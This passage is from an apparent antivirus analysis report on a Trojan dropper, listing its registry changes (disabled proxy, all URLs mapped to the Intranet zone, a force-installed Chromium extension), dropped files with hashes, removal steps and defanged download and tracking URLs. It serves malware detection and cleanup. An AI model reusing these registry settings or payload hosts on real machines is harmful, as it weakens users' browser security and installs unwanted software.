"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsu5.tmp:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E D0 2B C3 4C 34 E4 3B 47 6E 7A 0B 21 DA 5F 66"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web nodes (names without dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nssF.tmp:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 19 FC E3 99 81 E2 B9 B6 A2 B0 64 AC D0 D5 26"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-jot-cra-opw-crb-crr"
The process avg23.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 26 73 51 0A 2C 58 9B B3 F2 8A 35 EE 5D E2 6D"
The process %original file name%.exe:1364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E E3 D1 B0 F8 EC 78 9B 7B 84 16 03 1D EF 10 BD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web nodes (names without dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process adv_128.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 74 92 C1 3A 99 37 3D 39 FA 15 97 8B 06 C1 B0"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallSources]
"1" = "http://ext.internetquickaccess.com/*"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist]
"1" = "pcjnhdkacfipfoicilllfabpbghiegpn;http://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn"
The process FlashPlayerUpdateService.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D EE 0C 75 E4 9E D7 75 10 6E 08 57 88 09 BB 9A"
[HKLM\SOFTWARE\Macromedia\FlashPlayerSAU]
"LastUpdateCheck" = "Type: REG_QWORD, Length: 8"
"UpdateAttempts" = "0"
"CheckFrequency" = "1"
Dropped PE files
MD5 | File path |
---|---|
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6471.exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6481.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6548\setup.exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
a46fd47af97a4430b0fa9ad56eb856d4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\avg23.exe |
db23b6b1b300492d6e8525c80d87e447 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe |
91baa8204ef1ace5371035f4adacfbd7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf16.tmp |
8574ef2796bdf5b7c82ae981831e45a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq21.tmp |
e605da91292e59124b415a5d5357c2d0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu5.tmp |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvB.tmp\inetc.dll |
8217fb536a761fb752904d84de9e773f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\cmmdWriter[1].exe |
0da52b2de8e61350f5291a3da003ceea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\LRP8nPI[1].exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\Validate[1].exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\installer[1].exe |
a46fd47af97a4430b0fa9ad56eb856d4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\SilentInstaller_dotnet4[1].exe |
8574ef2796bdf5b7c82ae981831e45a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\prepreinstaller_win[1].exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\setup[1].exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsq18.tmp:1164
6471.exe:1916
chrome.exe:2304
chrome.exe:2268
chrome.exe:2216
chrome.exe:1980
chrome.exe:2252
nsq21.tmp:168
nso13.tmp:508
6481.exe:1988
tmp25.tmp:3448
setup.exe:576
setup.exe:240
tmp24.tmp.exe:1492
nsj1B.tmp:1648
dwwin.exe:2404
nsu5.tmp:468
nssF.tmp:1668
%original file name%.exe:1364
FlashPlayerUpdateService.exe:3536
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome.dll (299767 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\snapshot_blob.bin (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\gu.pak (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\cs.pak (260 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pl.pak (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bg.pak (1705 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\chrome.exe (3700 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\delegate_execute.exe (3760 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\am.pak (1640 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hr.pak (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\et.pak (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libglesv2.dll (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ca.pak (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\wow_helper.exe (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sl.pak (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ro.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl64.exe (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\VisualElementsManifest.xml (401 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\th.pak (1788 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hu.pak (274 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nl.pak (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\tr.pak (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\logo.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libexif.dll (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ja.pak (311 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-GB.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\setup.exe (16808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\SETUP.EX_ (1612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\CHROME.PACKED.7Z (274744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6481.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\87D37.dmp (226144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1B.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\installer[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq18.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\prepreinstaller_win[1].exe (20400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq21.tmp (20400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbA.tmp (13911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\LRP8nPI[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp25.tmp (718712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp24.tmp.exe (275838 bytes)
%WinDir%\Tasks\Adobe Flash Player Updater.job (830 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23462 | 23552 | 4.51398 | 9d64b6ac6eb1aa41e38f6cc8798b652e |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 3774424 | 1024 | 3.26654 | af685ae5a632e08acd6c90a62cdfc3bb |
.ndata | 3813376 | 1798144 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 5611520 | 1736 | 2048 | 2.02827 | da7a0b9d9567037dd7f36744d830319f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 54
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.225.244.49 |
hxxp://download-servers.com/SysInfo/Validate.exe | 95.211.189.17 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.230.93.5 |
hxxp://cds.c5z6s5a3.hwcdn.net/crcb/123/installer.exe | |
hxxp://ipgeoapi.com/ | 107.21.106.96 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6474 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2429 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=3804 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=3707 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=3065 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
